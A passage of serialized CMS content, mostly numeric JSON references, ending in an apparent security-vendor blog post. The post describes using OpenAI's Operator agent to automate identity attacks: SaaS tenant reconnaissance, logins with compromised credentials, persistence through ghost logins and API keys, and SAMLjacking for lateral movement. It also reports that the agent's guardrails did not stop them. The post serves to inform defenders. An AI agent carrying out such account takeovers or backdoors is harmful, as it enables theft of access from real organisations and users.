"content":137628},{},[137629],{"nodeType":173,"value":111900,"marks":137630,"data":137632},[137631],{"type":370},{},{"nodeType":178,"data":137634,"content":137635},{},[137636,137639,137646],{"nodeType":173,"value":111908,"marks":137637,"data":137638},[],{},{"nodeType":186,"data":137640,"content":137641},{"uri":111913},[137642],{"nodeType":173,"value":111916,"marks":137643,"data":137645},[137644],{"type":194},{},{"nodeType":173,"value":111921,"marks":137647,"data":137648},[],{},{"nodeType":178,"data":137650,"content":137651},{},[137652],{"nodeType":173,"value":111928,"marks":137653,"data":137654},[],{},{"nodeType":178,"data":137656,"content":137657},{},[137658,137661,137668,137671,137678],{"nodeType":173,"value":111935,"marks":137659,"data":137660},[],{},{"nodeType":186,"data":137662,"content":137663},{"uri":111940},[137664],{"nodeType":173,"value":111943,"marks":137665,"data":137667},[137666],{"type":194},{},{"nodeType":173,"value":111948,"marks":137669,"data":137670},[],{},{"nodeType":186,"data":137672,"content":137673},{"uri":111953},[137674],{"nodeType":173,"value":111956,"marks":137675,"data":137677},[137676],{"type":194},{},{"nodeType":173,"value":111961,"marks":137679,"data":137680},[],{},{"nodeType":178,"data":137682,"content":137683},{},[137684,137687,137695],{"nodeType":173,"value":2596,"marks":137685,"data":137686},[],{},{"nodeType":186,"data":137688,"content":137689},{"uri":62639},[137690],{"nodeType":173,"value":111974,"marks":137691,"data":137694},[137692,137693],{"type":194},{"type":370},{},{"nodeType":173,"value":111980,"marks":137696,"data":137697},[],{},{"nodeType":312,"data":137699,"content":137702},{"target":137700},{"sys":137701},{"id":105077,"type":317,"linkType":318},[],{"nodeType":178,"data":137704,"content":137705},{},[137706,137709,137716],{"nodeType":173,"value":111992,"marks":137707,"data":137708},[],{},{"nodeType":186,"data":137710,"content":137711},{"uri":111997},[137712],{"nodeType":173,"value":112000,"marks":137713,"data":137715},[137714],{"type":194},{},{"nodeType":173,"value":112005,"marks":137717,"data":137718},[],{},{"nodeType":178,"data":137720,"content":137721},{},[137722,137725,137732],{"nodeType":173,"value":112012,"marks":137723,"data":137724},[],{},{"nodeType":186,"data":137726,"content":137727},{"uri":112017},[137728],{"nodeType":173,"value":112020,"marks":137729,"data":137731},[137730],{"type":194},{},{"nodeType":173,"value":112025,"marks":137733,"data":137734},[],{},{"nodeType":235,"data":137736,"content":137737},{},[137738],{"nodeType":173,"value":112032,"marks":137739,"data":137741},[137740],{"type":370},{},{"nodeType":178,"data":137743,"content":137744},{},[137745],{"nodeType":173,"value":112040,"marks":137746,"data":137747},[],{},{"nodeType":178,"data":137749,"content":137750},{},[137751],{"nodeType":173,"value":112047,"marks":137752,"data":137753},[],{},{"nodeType":312,"data":137755,"content":137758},{"target":137756},{"sys":137757},{"id":112054,"type":317,"linkType":318},[],{"nodeType":178,"data":137760,"content":137761},{},[137762,137765,137772],{"nodeType":173,"value":112060,"marks":137763,"data":137764},[],{},{"nodeType":186,"data":137766,"content":137767},{"uri":77513},[137768],{"nodeType":173,"value":2570,"marks":137769,"data":137771},[137770],{"type":194},{},{"nodeType":173,"value":112071,"marks":137773,"data":137774},[],{},{"nodeType":231,"data":137776,"content":137777},{},[],{"nodeType":169,"data":137779,"content":137780},{},[137781],{"nodeType":173,"value":112081,"marks":137782,"data":137784},[137783],{"type":370},{},{"nodeType":178,"data":137786,"content":137787},{},[137788,137791,137795],{"nodeType":173,"value":112089,"marks":137789,"data":137790},[],{},{"nodeType":173,"value":3107,"marks":137792,"data":137794},[137793],{"type":370},{},{"nodeType":173,"value":112097,"marks":137796,"data":137797},[],{},{"nodeType":178,"data":137799,"content":137800},{},[137801],{"nodeType":173,"value":112104,"marks":137802,"data":137803},[],{},{"nodeType":178,"data":137805,"content":137806},{},[137807],{"nodeType":173,"value":71740,"marks":137808,"data":137809},[],{},{"nodeType":250,"data":137811,"content":137812},{},[137813,137836,137845],{"nodeType":254,"data":137814,"content":137815},{},[137816],{"nodeType":178,"data":137817,"content":137818},{},[137819,137822,137826,137829,137833],{"nodeType":173,"value":18635,"marks":137820,"data":137821},[],{},{"nodeType":173,"value":2578,"marks":137823,"data":137825},[137824],{"type":370},{},{"nodeType":173,"value":112130,"marks":137827,"data":137828},[],{},{"nodeType":173,"value":18649,"marks":137830,"data":137832},[137831],{"type":370},{},{"nodeType":173,"value":112138,"marks":137834,"data":137835},[],{},{"nodeType":254,"data":137837,"content":137838},{},[137839],{"nodeType":178,"data":137840,"content":137841},{},[137842],{"nodeType":173,"value":112148,"marks":137843,"data":137844},[],{},{"nodeType":254,"data":137846,"content":137847},{},[137848],{"nodeType":178,"data":137849,"content":137850},{},[137851],{"nodeType":173,"value":112158,"marks":137852,"data":137853},[],{},{"nodeType":312,"data":137855,"content":137858},{"target":137856},{"sys":137857},{"id":77578,"type":317,"linkType":318},[],{"nodeType":178,"data":137860,"content":137861},{},[137862],{"nodeType":173,"value":112170,"marks":137863,"data":137864},[],{},{"nodeType":178,"data":137866,"content":137867},{},[137868],{"nodeType":173,"value":112177,"marks":137869,"data":137870},[],{},{"nodeType":250,"data":137872,"content":137873},{},[137874,137883,137892,137901],{"nodeType":254,"data":137875,"content":137876},{},[137877],{"nodeType":178,"data":137878,"content":137879},{},[137880],{"nodeType":173,"value":112190,"marks":137881,"data":137882},[],{},{"nodeType":254,"data":137884,"content":137885},{},[137886],{"nodeType":178,"data":137887,"content":137888},{},[137889],{"nodeType":173,"value":112200,"marks":137890,"data":137891},[],{},{"nodeType":254,"data":137893,"content":137894},{},[137895],{"nodeType":178,"data":137896,"content":137897},{},[137898],{"nodeType":173,"value":112210,"marks":137899,"data":137900},[],{},{"nodeType":254,"data":137902,"content":137903},{},[137904],{"nodeType":178,"data":137905,"content":137906},{},[137907],{"nodeType":173,"value":112220,"marks":137908,"data":137909},[],{},{"nodeType":231,"data":137911,"content":137912},{},[],{"nodeType":169,"data":137914,"content":137915},{},[137916],{"nodeType":173,"value":112230,"marks":137917,"data":137919},[137918],{"type":370},{},{"nodeType":178,"data":137921,"content":137922},{},[137923],{"nodeType":173,"value":112238,"marks":137924,"data":137925},[],{},{"nodeType":231,"data":137927,"content":137928},{},[],{"nodeType":169,"data":137930,"content":137931},{},[137932],{"nodeType":173,"value":71801,"marks":137933,"data":137934},[],{},{"nodeType":178,"data":137936,"content":137937},{},[137938,137941,137948],{"nodeType":173,"value":112254,"marks":137939,"data":137940},[],{},{"nodeType":186,"data":137942,"content":137943},{"uri":473},[137944],{"nodeType":173,"value":2889,"marks":137945,"data":137947},[137946],{"type":194},{},{"nodeType":173,"value":1477,"marks":137949,"data":137950},[],{},{"items":137952},[137953,137955],{"sys":137954,"name":26137},{"id":26136},{"sys":137956,"name":505},{"id":504},{"items":137958},[137959],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":137960},{"url":2911},{"__typename":1528,"sys":137962,"content":137963,"title":4774,"synopsis":4775,"hashTags":118,"publishedDate":4776,"slug":4777,"tagsCollection":138653,"authorsCollection":138657},{"id":3979},{"json":137964},{"data":137965,"content":137966,"nodeType":165},{},[137967,137972,137988,137994,138000,138005,138008,138015,138021,138037,138047,138053,138059,138065,138149,138152,138159,138234,138239,138242,138249,138256,138262,138268,138275,138291,138297,138304,138310,138316,138323,138329,138335,138351,138356,138359,138366,138373,138379,138468,138474,138481,138487,138493,138498,138505,138511,138517,138523,138530,138536,138542,138548,138554,138559,138562,138569,138575,138605,138611,138626,138642,138647],{"data":137968,"content":137971,"nodeType":312},{"target":137969},{"sys":137970},{"id":3988,"type":317,"linkType":318},[],{"data":137973,"content":137974,"nodeType":178},{},[137975,137978,137985],{"data":137976,"marks":137977,"value":3996,"nodeType":173},{},[],{"data":137979,"content":137980,"nodeType":186},{"uri":3999},[137981],{"data":137982,"marks":137983,"value":4005,"nodeType":173},{},[137984],{"type":194},{"data":137986,"marks":137987,"value":4009,"nodeType":173},{},[],{"data":137989,"content":137990,"nodeType":178},{},[137991],{"data":137992,"marks":137993,"value":4016,"nodeType":173},{},[],{"data":137995,"content":137996,"nodeType":178},{},[137997],{"data":137998,"marks":137999,"value":4023,"nodeType":173},{},[],{"data":138001,"content":138004,"nodeType":312},{"target":138002},{"sys":138003},{"id":4028,"type":317,"linkType":318},[],{"data":138006,"content":138007,"nodeType":231},{},[],{"data":138009,"content":138010,"nodeType":169},{},[138011],{"data":138012,"marks":138013,"value":4040,"nodeType":173},{},[138014],{"type":370},{"data":138016,"content":138017,"nodeType":178},{},[138018],{"data":138019,"marks":138020,"value":4047,"nodeType":173},{},[],{"data":138022,"content":138023,"nodeType":178},{},[138024,138027,138034],{"data":138025,"marks":138026,"value":4054,"nodeType":173},{},[],{"data":138028,"content":138029,"nodeType":186},{"uri":4057},[138030],{"data":138031,"marks":138032,"value":4063,"nodeType":173},{},[138033],{"type":194},{"data":138035,"marks":138036,"value":197,"nodeType":173},{},[],{"data":138038,"content":138039,"nodeType":3769},{},[138040],{"data":138041,"content":138042,"nodeType":178},{},[138043],{"data":138044,"marks":138045,"value":4077,"nodeType":173},{},[138046],{"type":370},{"data":138048,"content":138049,"nodeType":178},{},[138050],{"data":138051,"marks":138052,"value":4084,"nodeType":173},{},[],{"data":138054,"content":138055,"nodeType":178},{},[138056],{"data":138057,"marks":138058,"value":4091,"nodeType":173},{},[],{"data":138060,"content":138061,"nodeType":178},{},[138062],{"data":138063,"marks":138064,"value":4098,"nodeType":173},{},[],{"data":138066,"content":138067,"nodeType":250},{},[138068,138077,138086,138095,138104,138113,138122,138131,138140],{"data":138069,"content":138070,"nodeType":254},{},[138071],{"data":138072,"content":138073,"nodeType":178},{},[138074],{"data":138075,"marks":138076,"value":4111,"nodeType":173},{},[],{"data":138078,"content":138079,"nodeType":254},{},[138080],{"data":138081,"content":138082,"nodeType":178},{},[138083],{"data":138084,"marks":138085,"value":4121,"nodeType":173},{},[],{"data":138087,"content":138088,"nodeType":254},{},[138089],{"data":138090,"content":138091,"nodeType":178},{},[138092],{"data":138093,"marks":138094,"value":4131,"nodeType":173},{},[],{"data":138096,"content":138097,"nodeType":254},{},[138098],{"data":138099,"content":138100,"nodeType":178},{},[138101],{"data":138102,"marks":138103,"value":4141,"nodeType":173},{},[],{"data":138105,"content":138106,"nodeType":254},{},[138107],{"data":138108,"content":138109,"nodeType":178},{},[138110],{"data":138111,"marks":138112,"value":4151,"nodeType":173},{},[],{"data":138114,"content":138115,"nodeType":254},{},[138116],{"data":138117,"content":138118,"nodeType":178},{},[138119],{"data":138120,"marks":138121,"value":4161,"nodeType":173},{},[],{"data":138123,"content":138124,"nodeType":254},{},[138125],{"data":138126,"content":138127,"nodeType":178},{},[138128],{"data":138129,"marks":138130,"value":4171,"nodeType":173},{},[],{"data":138132,"content":138133,"nodeType":254},{},[138134],{"data":138135,"content":138136,"nodeType":178},{},[138137],{"data":138138,"marks":138139,"value":4181,"nodeType":173},{},[],{"data":138141,"content":138142,"nodeType":254},{},[138143],{"data":138144,"content":138145,"nodeType":178},{},[138146],{"data":138147,"marks":138148,"value":4191,"nodeType":173},{},[],{"data":138150,"content":138151,"nodeType":231},{},[],{"data":138153,"content":138154,"nodeType":169},{},[138155],{"data":138156,"marks":138157,"value":4202,"nodeType":173},{},[138158],{"type":370},{"data":138160,"content":138161,"nodeType":250},{},[138162,138171,138180,138189,138198,138207,138216,138225],{"data":138163,"content":138164,"nodeType":254},{},[138165],{"data":138166,"content":138167,"nodeType":178},{},[138168],{"data":138169,"marks":138170,"value":4215,"nodeType":173},{},[],{"data":138172,"content":138173,"nodeType":254},{},[138174],{"data":138175,"content":138176,"nodeType":178},{},[138177],{"data":138178,"marks":138179,"value":4225,"nodeType":173},{},[],{"data":138181,"content":138182,"nodeType":254},{},[138183],{"data":138184,"content":138185,"nodeType":178},{},[138186],{"data":138187,"marks":138188,"value":4235,"nodeType":173},{},[],{"data":138190,"content":138191,"nodeType":254},{},[138192],{"data":138193,"content":138194,"nodeType":178},{},[138195],{"data":138196,"marks":138197,"value":4245,"nodeType":173},{},[],{"data":138199,"content":138200,"nodeType":254},{},[138201],{"data":138202,"content":138203,"nodeType":178},{},[138204],{"data":138205,"marks":138206,"value":4255,"nodeType":173},{},[],{"data":138208,"content":138209,"nodeType":254},{},[138210],{"data":138211,"content":138212,"nodeType":178},{},[138213],{"data":138214,"marks":138215,"value":4265,"nodeType":173},{},[],{"data":138217,"content":138218,"nodeType":254},{},[138219],{"data":138220,"content":138221,"nodeType":178},{},[138222],{"data":138223,"marks":138224,"value":4275,"nodeType":173},{},[],{"data":138226,"content":138227,"nodeType":254},{},[138228],{"data":138229,"content":138230,"nodeType":178},{},[138231],{"data":138232,"marks":138233,"value":4285,"nodeType":173},{},[],{"data":138235,"content":138238,"nodeType":312},{"target":138236},{"sys":138237},{"id":4290,"type":317,"linkType":318},[],{"data":138240,"content":138241,"nodeType":231},{},[],{"data":138243,"content":138244,"nodeType":169},{},[138245],{"data":138246,"marks":138247,"value":4302,"nodeType":173},{},[138248],{"type":370},{"data":138250,"content":138251,"nodeType":235},{},[138252],{"data":138253,"marks":138254,"value":4310,"nodeType":173},{},[138255],{"type":370},{"data":138257,"content":138258,"nodeType":178},{},[138259],{"data":138260,"marks":138261,"value":4317,"nodeType":173},{},[],{"data":138263,"content":138264,"nodeType":178},{},[138265],{"data":138266,"marks":138267,"value":4324,"nodeType":173},{},[],{"data":138269,"content":138270,"nodeType":235},{},[138271],{"data":138272,"marks":138273,"value":4332,"nodeType":173},{},[138274],{"type":370},{"data":138276,"content":138277,"nodeType":178},{},[138278,138281,138288],{"data":138279,"marks":138280,"value":4339,"nodeType":173},{},[],{"data":138282,"content":138283,"nodeType":186},{"uri":4342},[138284],{"data":138285,"marks":138286,"value":835,"nodeType":173},{},[138287],{"type":194},{"data":138289,"marks":138290,"value":197,"nodeType":173},{},[],{"data":138292,"content":138293,"nodeType":178},{},[138294],{"data":138295,"marks":138296,"value":4357,"nodeType":173},{},[],{"data":138298,"content":138299,"nodeType":235},{},[138300],{"data":138301,"marks":138302,"value":4365,"nodeType":173},{},[138303],{"type":370},{"data":138305,"content":138306,"nodeType":178},{},[138307],{"data":138308,"marks":138309,"value":4372,"nodeType":173},{},[],{"data":138311,"content":138312,"nodeType":178},{},[138313],{"data":138314,"marks":138315,"value":4379,"nodeType":173},{},[],{"data":138317,"content":138318,"nodeType":235},{},[138319],{"data":138320,"marks":138321,"value":4387,"nodeType":173},{},[138322],{"type":370},{"data":138324,"content":138325,"nodeType":178},{},[138326],{"data":138327,"marks":138328,"value":4394,"nodeType":173},{},[],{"data":138330,"content":138331,"nodeType":178},{},[138332],{"data":138333,"marks":138334,"value":4401,"nodeType":173},{},[],{"data":138336,"content":138337,"nodeType":178},{},[138338,138341,138348],{"data":138339,"marks":138340,"value":4408,"nodeType":173},{},[],{"data":138342,"content":138343,"nodeType":186},{"uri":4411},[138344],{"data":138345,"marks":138346,"value":4417,"nodeType":173},{},[138347],{"type":194},{"data":138349,"marks":138350,"value":4421,"nodeType":173},{},[],{"data":138352,"content":138355,"nodeType":312},{"target":138353},{"sys":138354},{"id":4426,"type":317,"linkType":318},[],{"data":138357,"content":138358,"nodeType":231},{},[],{"data":138360,"content":138361,"nodeType":169},{},[138362],{"data":138363,"marks":138364,"value":4438,"nodeType":173},{},[138365],{"type":370},{"data":138367,"content":138368,"nodeType":235},{},[138369],{"data":138370,"marks":138371,"value":4446,"nodeType":173},{},[138372],{"type":370},{"data":138374,"content":138375,"nodeType":178},{},[138376],{"data":138377,"marks":138378,"value":4453,"nodeType":173},{},[],{"data":138380,"content":138381,"nodeType":250},{},[138382,138401,138420,138449],{"data":138383,"content":138384,"nodeType":254},{},[138385],{"data":138386,"content":138387,"nodeType":178},{},[138388,138391,138398],{"data":138389,"marks":138390,"value":4466,"nodeType":173},{},[],{"data":138392,"content":138393,"nodeType":186},{"uri":4469},[138394],{"data":138395,"marks":138396,"value":4475,"nodeType":173},{},[138397],{"type":194},{"data":138399,"marks":138400,"value":4479,"nodeType":173},{},[],{"data":138402,"content":138403,"nodeType":254},{},[138404],{"data":138405,"content":138406,"nodeType":178},{},[138407,138410,138417],{"data":138408,"marks":138409,"value":4489,"nodeType":173},{},[],{"data":138411,"content":138412,"nodeType":186},{"uri":4492},[138413],{"data":138414,"marks":138415,"value":4498,"nodeType":173},{},[138416],{"type":194},{"data":138418,"marks":138419,"value":1477,"nodeType":173},{},[],{"data":138421,"content":138422,"nodeType":254},{},[138423],{"data":138424,"content":138425,"nodeType":178},{},[138426,138429,138436,138439,138446],{"data":138427,"marks":138428,"value":4511,"nodeType":173},{},[],{"data":138430,"content":138431,"nodeType":186},{"uri":4342},[138432],{"data":138433,"marks":138434,"value":4519,"nodeType":173},{},[138435],{"type":194},{"data":138437,"marks":138438,"value":4523,"nodeType":173},{},[],{"data":138440,"content":138441,"nodeType":186},{"uri":4526},[138442],{"data":138443,"marks":138444,"value":4532,"nodeType":173},{},[138445],{"type":194},{"data":138447,"marks":138448,"value":4536,"nodeType":173},{},[],{"data":138450,"content":138451,"nodeType":254},{},[138452],{"data":138453,"content":138454,"nodeType":178},{},[138455,138458,138465],{"data":138456,"marks":138457,"value":4546,"nodeType":173},{},[],{"data":138459,"content":138460,"nodeType":186},{"uri":4492},[138461],{"data":138462,"marks":138463,"value":4554,"nodeType":173},{},[138464],{"type":194},{"data":138466,"marks":138467,"value":4558,"nodeType":173},{},[],{"data":138469,"content":138470,"nodeType":178},{},[138471],{"data":138472,"marks":138473,"value":4565,"nodeType":173},{},[],{"data":138475,"content":138476,"nodeType":235},{},[138477],{"data":138478,"marks":138479,"value":4573,"nodeType":173},{},[138480],{"type":370},{"data":138482,"content":138483,"nodeType":178},{},[138484],{"data":138485,"marks":138486,"value":4580,"nodeType":173},{},[],{"data":138488,"content":138489,"nodeType":178},{},[138490],{"data":138491,"marks":138492,"value":4587,"nodeType":173},{},[],{"data":138494,"content":138497,"nodeType":312},{"target":138495},{"sys":138496},{"id":4592,"type":317,"linkType":318},[],{"data":138499,"content":138500,"nodeType":235},{},[138501],{"data":138502,"marks":138503,"value":4601,"nodeType":173},{},[138504],{"type":370},{"data":138506,"content":138507,"nodeType":178},{},[138508],{"data":138509,"marks":138510,"value":4608,"nodeType":173},{},[],{"data":138512,"content":138513,"nodeType":178},{},[138514],{"data":138515,"marks":138516,"value":4615,"nodeType":173},{},[],{"data":138518,"content":138519,"nodeType":178},{},[138520],{"data":138521,"marks":138522,"value":4622,"nodeType":173},{},[],{"data":138524,"content":138525,"nodeType":235},{},[138526],{"data":138527,"marks":138528,"value":4630,"nodeType":173},{},[138529],{"type":370},{"data":138531,"content":138532,"nodeType":178},{},[138533],{"data":138534,"marks":138535,"value":4637,"nodeType":173},{},[],{"data":138537,"content":138538,"nodeType":178},{},[138539],{"data":138540,"marks":138541,"value":4644,"nodeType":173},{},[],{"data":138543,"content":138544,"nodeType":178},{},[138545],{"data":138546,"marks":138547,"value":4651,"nodeType":173},{},[],{"data":138549,"content":138550,"nodeType":178},{},[138551],{"data":138552,"marks":138553,"value":4658,"nodeType":173},{},[],{"data":138555,"content":138558,"nodeType":312},{"target":138556},{"sys":138557},{"id":4663,"type":317,"linkType":318},[],{"data":138560,"content":138561,"nodeType":231},{},[],{"data":138563,"content":138564,"nodeType":169},{},[138565],{"data":138566,"marks":138567,"value":4675,"nodeType":173},{},[138568],{"type":370},{"data":138570,"content":138571,"nodeType":178},{},[138572],{"data":138573,"marks":138574,"value":4682,"nodeType":173},{},[],{"data":138576,"content":138577,"nodeType":250},{},[138578,138587,138596],{"data":138579,"content":138580,"nodeType":254},{},[138581],{"data":138582,"content":138583,"nodeType":178},{},[138584],{"data":138585,"marks":138586,"value":4695,"nodeType":173},{},[],{"data":138588,"content":138589,"nodeType":254},{},[138590],{"data":138591,"content":138592,"nodeType":178},{},[138593],{"data":138594,"marks":138595,"value":4705,"nodeType":173},{},[],{"data":138597,"content":138598,"nodeType":254},{},[138599],{"data":138600,"content":138601,"nodeType":178},{},[138602],{"data":138603,"marks":138604,"value":4715,"nodeType":173},{},[],{"data":138606,"content":138607,"nodeType":178},{},[138608],{"data":138609,"marks":138610,"value":4722,"nodeType":173},{},[],{"data":138612,"content":138613,"nodeType":178},{},[138614,138617,138623],{"data":138615,"marks":138616,"value":4729,"nodeType":173},{},[],{"data":138618,"content":138619,"nodeType":186},{"uri":4732},[138620],{"data":138621,"marks":138622,"value":4737,"nodeType":173},{},[],{"data":138624,"marks":138625,"value":4741,"nodeType":173},{},[],{"data":138627,"content":138628,"nodeType":178},{},[138629,138632,138639],{"data":138630,"marks":138631,"value":4748,"nodeType":173},{},[],{"data":138633,"content":138634,"nodeType":186},{"uri":4751},[138635],{"data":138636,"marks":138637,"value":4757,"nodeType":173},{},[138638],{"type":194},{"data":138640,"marks":138641,"value":4761,"nodeType":173},{},[],{"data":138643,"content":138646,"nodeType":312},{"target":138644},{"sys":138645},{"id":4766,"type":317,"linkType":318},[],{"data":138648,"content":138649,"nodeType":178},{},[138650],{"data":138651,"marks":138652,"value":37,"nodeType":173},{},[],{"items":138654},[138655],{"sys":138656,"name":505},{"id":504},{"items":138658},[138659],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":138660},{"url":1496},{"__typename":1528,"sys":138662,"content":138664,"title":139234,"synopsis":139235,"hashTags":118,"publishedDate":139236,"slug":139237,"tagsCollection":139238,"authorsCollection":139244},{"id":138663},"3dndhjREJvJCbGRLseipak",{"json":138665},{"data":138666,"content":138667,"nodeType":165},{},[138668,138687,138694,138701,138708,138715,138718,138726,138743,138750,138773,138780,138787,138794,138800,138803,138811,138818,138825,138832,138838,138841,138849,138856,138863,138870,138876,138879,138887,138894,138901,138907,138913,138916,138924,138931,138937,138943,138950,138953,138961,138968,138975,138982,138989,139022,139033,139039,139046,139049,139057,139064,139076,139084,139091,139098,139105,139128,139147,139150,139157,139164,139182,139188,139191,139199,139206,139223,139228],{"data":138669,"content":138670,"nodeType":178},{},[138671,138675,138683],{"data":138672,"marks":138673,"value":138674,"nodeType":173},{},[],"If you want the background on CUAs and OpenAI Operator ",{"data":138676,"content":138678,"nodeType":186},{"uri":138677},"https://pushsecurity.com/blog/considering-the-impact-of-computer-using-agents/",[138679],{"data":138680,"marks":138681,"value":122317,"nodeType":173},{},[138682],{"type":194},{"data":138684,"marks":138685,"value":138686,"nodeType":173},{},[],". But, the TL;DR is that Computer-Using Agents (CUAs) are a new type of AI agent that drives your browser/OS for you. ",{"data":138688,"content":138689,"nodeType":178},{},[138690],{"data":138691,"marks":138692,"value":138693,"nodeType":173},{},[],"Unlike traditional AI models that are limited to text-based interactions, CUAs can actually use a web browser like a real person. Think of them as an advanced no-code automation platform driven by AI — capable of navigating login pages, entering credentials, and interacting with SaaS applications at scale. This is a huge leap forward from the most common malicious use cases we’ve seen for AI so far. ",{"data":138695,"content":138696,"nodeType":178},{},[138697],{"data":138698,"marks":138699,"value":138700,"nodeType":173},{},[],"At Push, we’re fully focused on stopping identity attacks. This meant that when we saw the release of Operator, we could only think of one question: How can attackers abuse this?",{"data":138702,"content":138703,"nodeType":178},{},[138704],{"data":138705,"marks":138706,"value":138707,"nodeType":173},{},[],"Full disclosure, this wasn’t an ‘LLM red team’ style exercise, or even anything close. We weren’t interested in verifying how securely data is stored (I mean who cares, these wouldn’t be our credentials if we were a real attacker, right?) and frankly we assumed that the in-app guardrails wouldn’t be robust enough to stop us. And within our first 30 minutes of testing, we were proved correct. ",{"data":138709,"content":138710,"nodeType":178},{},[138711],{"data":138712,"marks":138713,"value":138714,"nodeType":173},{},[],"Here’s what we found. ",{"data":138716,"content":138717,"nodeType":231},{},[],{"data":138719,"content":138720,"nodeType":169},{},[138721],{"data":138722,"marks":138723,"value":138725,"nodeType":173},{},[138724],{"type":370},"You can automate (almost) the entire identity kill chain ",{"data":138727,"content":138728,"nodeType":178},{},[138729,138733,138740],{"data":138730,"marks":138731,"value":138732,"nodeType":173},{},[],"For our test, we looked at how Operator could be applied to identity attacks across discrete Cyber Kill Chain stages and the associated Tactics, Techniques, and Procedures (TTPs) as per the ",{"data":138734,"content":138735,"nodeType":186},{"uri":88239},[138736],{"data":138737,"marks":138738,"value":88245,"nodeType":173},{},[138739],{"type":194},{"data":138741,"marks":138742,"value":197,"nodeType":173},{},[],{"data":138744,"content":138745,"nodeType":178},{},[138746],{"data":138747,"marks":138748,"value":138749,"nodeType":173},{},[],"One of the key challenges facing attackers when it comes to scaling identity attacks is that of targeting many different internet apps — all of which are:",{"data":138751,"content":138752,"nodeType":250},{},[138753,138763],{"data":138754,"content":138755,"nodeType":254},{},[138756],{"data":138757,"content":138758,"nodeType":178},{},[138759],{"data":138760,"marks":138761,"value":138762,"nodeType":173},{},[],"Complex and highly customized, with a graphically-driven interface that is different every time.",{"data":138764,"content":138765,"nodeType":254},{},[138766],{"data":138767,"content":138768,"nodeType":178},{},[138769],{"data":138770,"marks":138771,"value":138772,"nodeType":173},{},[],"Specifically designed to prevent malicious automation with things like account lockouts and bot protections like CAPTCHA. ",{"data":138774,"content":138775,"nodeType":178},{},[138776],{"data":138777,"marks":138778,"value":138779,"nodeType":173},{},[],"This is a big change from traditional networks, where you could simply port scan and spray credentials, encountering the same protocols and services for every environment you wanted to target.",{"data":138781,"content":138782,"nodeType":178},{},[138783],{"data":138784,"marks":138785,"value":138786,"nodeType":173},{},[],"Now, every app requires custom tooling that needs to be maintained as apps/pages change. Considering that there are more than 40k SaaS apps, this is no small task. ",{"data":138788,"content":138789,"nodeType":178},{},[138790],{"data":138791,"marks":138792,"value":138793,"nodeType":173},{},[],"But we thought: could Operator solve this problem, without any custom development or tooling whatsoever? And what else can it automate following the initial account takeover? ",{"data":138795,"content":138799,"nodeType":312},{"target":138796},{"sys":138797},{"id":138798,"type":317,"linkType":318},"6169dNBRXvahtV8VRlxLCJ",[],{"data":138801,"content":138802,"nodeType":231},{},[],{"data":138804,"content":138805,"nodeType":169},{},[138806],{"data":138807,"marks":138808,"value":138810,"nodeType":173},{},[138809],{"type":370},"1: Reconnaissance",{"data":138812,"content":138813,"nodeType":178},{},[138814],{"data":138815,"marks":138816,"value":138817,"nodeType":173},{},[],"Recon in the world of SaaS means figuring out which SaaS apps an organization uses, how users authenticate, and where the weak spots are. ",{"data":138819,"content":138820,"nodeType":178},{},[138821],{"data":138822,"marks":138823,"value":138824,"nodeType":173},{},[],"For example, I asked Operator to check whether a company used BambooHR, Atlassian, or Dropbox. Within minutes, the AI had identified valid tenant names, login URLs, and authentication methods for each app.",{"data":138826,"content":138827,"nodeType":178},{},[138828],{"data":138829,"marks":138830,"value":138831,"nodeType":173},{},[],"While a human attacker might research a handful of targets in a day, a CUA can research thousands, tirelessly mapping out identity attack surfaces across a long list of target organizations.",{"data":138833,"content":138837,"nodeType":312},{"target":138834},{"sys":138835},{"id":138836,"type":317,"linkType":318},"6Bt0cyPStlzhDzMaSdBYUp",[],{"data":138839,"content":138840,"nodeType":231},{},[],{"data":138842,"content":138843,"nodeType":169},{},[138844],{"data":138845,"marks":138846,"value":138848,"nodeType":173},{},[138847],{"type":370},"2: Initial Access",{"data":138850,"content":138851,"nodeType":178},{},[138852],{"data":138853,"marks":138854,"value":138855,"nodeType":173},{},[],"Once you’ve established your targets, you can automate account takeover using compromised credentials. ",{"data":138857,"content":138858,"nodeType":178},{},[138859],{"data":138860,"marks":138861,"value":138862,"nodeType":173},{},[],"I asked Operator to try to login using a set of compromised credentials across five different apps. It navigated to each page, attempted to login, noted the success or failure (and why), and moved on to the next app in the list. ",{"data":138864,"content":138865,"nodeType":178},{},[138866],{"data":138867,"marks":138868,"value":138869,"nodeType":173},{},[],"Now imagine that same process, but scaled up to tens of thousands of apps at once — with no custom development required. That’s where things start getting interesting.",{"data":138871,"content":138875,"nodeType":312},{"target":138872},{"sys":138873},{"id":138874,"type":317,"linkType":318},"6jk6hKykuvc0YAA4CkP8C2",[],{"data":138877,"content":138878,"nodeType":231},{},[],{"data":138880,"content":138881,"nodeType":169},{},[138882],{"data":138883,"marks":138884,"value":138886,"nodeType":173},{},[138885],{"type":370},"3: Persistence",{"data":138888,"content":138889,"nodeType":178},{},[138890],{"data":138891,"marks":138892,"value":138893,"nodeType":173},{},[],"Once you take over an account, you might not be able to exploit it straight away — particularly if you’re looking to execute a broader campaign across apps/organizations. So, I asked Operator to establish persistence mechanisms that would enable me to return to the app later, even if the credentials were changed or additional auth factors were deployed. ",{"data":138895,"content":138896,"nodeType":178},{},[138897],{"data":138898,"marks":138899,"value":138900,"nodeType":173},{},[],"Operator was able to analyse wildly different apps/pages with different options for configuring ghost logins, and was able to do things like create an API key and record it for me — a really effective backdoor that is extremely difficult for security teams to detect. ",{"data":138902,"content":138906,"nodeType":312},{"target":138903},{"sys":138904},{"id":138905,"type":317,"linkType":318},"6jtmxq2tMJIBga3hxdeDZs",[],{"data":138908,"content":138912,"nodeType":312},{"target":138909},{"sys":138910},{"id":138911,"type":317,"linkType":318},"5XqqCMLn0udFeoc2CQkmy6",[],{"data":138914,"content":138915,"nodeType":231},{},[],{"data":138917,"content":138918,"nodeType":169},{},[138919],{"data":138920,"marks":138921,"value":138923,"nodeType":173},{},[138922],{"type":370},"4: Lateral Movement",{"data":138925,"content":138926,"nodeType":178},{},[138927],{"data":138928,"marks":138929,"value":138930,"nodeType":173},{},[],"Operator can be used to perform in-app changes which can lay the groundwork for lateral movement. One example of how this can be achieved is through SAMLjacking, effectively allowing the attacker to poison the malicious app tenant and use it as a watering hole to harvest SSO credentials. 